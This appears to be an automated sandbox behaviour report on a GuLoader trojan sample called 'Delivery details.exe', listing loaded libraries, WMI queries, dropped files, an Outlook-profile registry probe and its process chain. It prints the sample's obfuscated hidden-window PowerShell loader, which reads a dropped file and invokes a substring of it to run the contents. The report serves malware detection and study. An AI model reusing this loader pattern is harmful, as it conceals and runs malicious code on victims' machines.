Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: Delivery details.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/15@3/3

Source: C:\Users\user\Desktop\Delivery details.exe

0_2_00403489

Source: C:\Users\user\Desktop\Delivery details.exe

Code function: 0_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404814

Source: C:\Users\user\Desktop\Delivery details.exe

Code function: 0_2_004020FE CoCreateInstance,

0_2_004020FE

Source: C:\Users\user\Desktop\Delivery details.exe

File created: C:\Users\user\AppData\Roaming\akroterion

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03

Source: C:\Users\user\Desktop\Delivery details.exe

File created: C:\Users\user\AppData\Local\Temp\nsd7EFB.tmp

Jump to behavior

Source: Delivery details.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Delivery details.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Delivery details.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Delivery details.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Delivery details.exe	Virustotal: Detection: 13%
Source: Delivery details.exe	ReversingLabs: Detection: 13%

Source: C:\Users\user\Desktop\Delivery details.exe

File read: C:\Users\user\Desktop\Delivery details.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Delivery details.exe C:\Users\user\Desktop\Delivery details.exe
Source: C:\Users\user\Desktop\Delivery details.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
Source: C:\Users\user\Desktop\Delivery details.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe	Jump to behavior

Source: C:\Users\user\Desktop\Delivery details.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Delivery details.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.3266183941.0000000004BC8000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Obfuscated command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c "set /A 1^^0			Jump to behavior

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Delivery details.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)
Source: C:\Users\user\Desktop\Delivery details.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" -windowstyle hidden "$Trvlede=Get-Content 'C:\Users\user\AppData\Roaming\akroterion\archmugwump\Kbslaaende.Fri';$Argentinas=$Trvlede.SubString(59499,3);.$Argentinas($Trvlede)			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_02A8F9C7 pushad ; iretd		6_2_02A8F9C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_02A80C3D push edi; ret		6_2_02A80CC2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\akroterion\archmugwump\Whitrack\Hundehullets\semimanufactured\Delivery details.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Delivery details.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
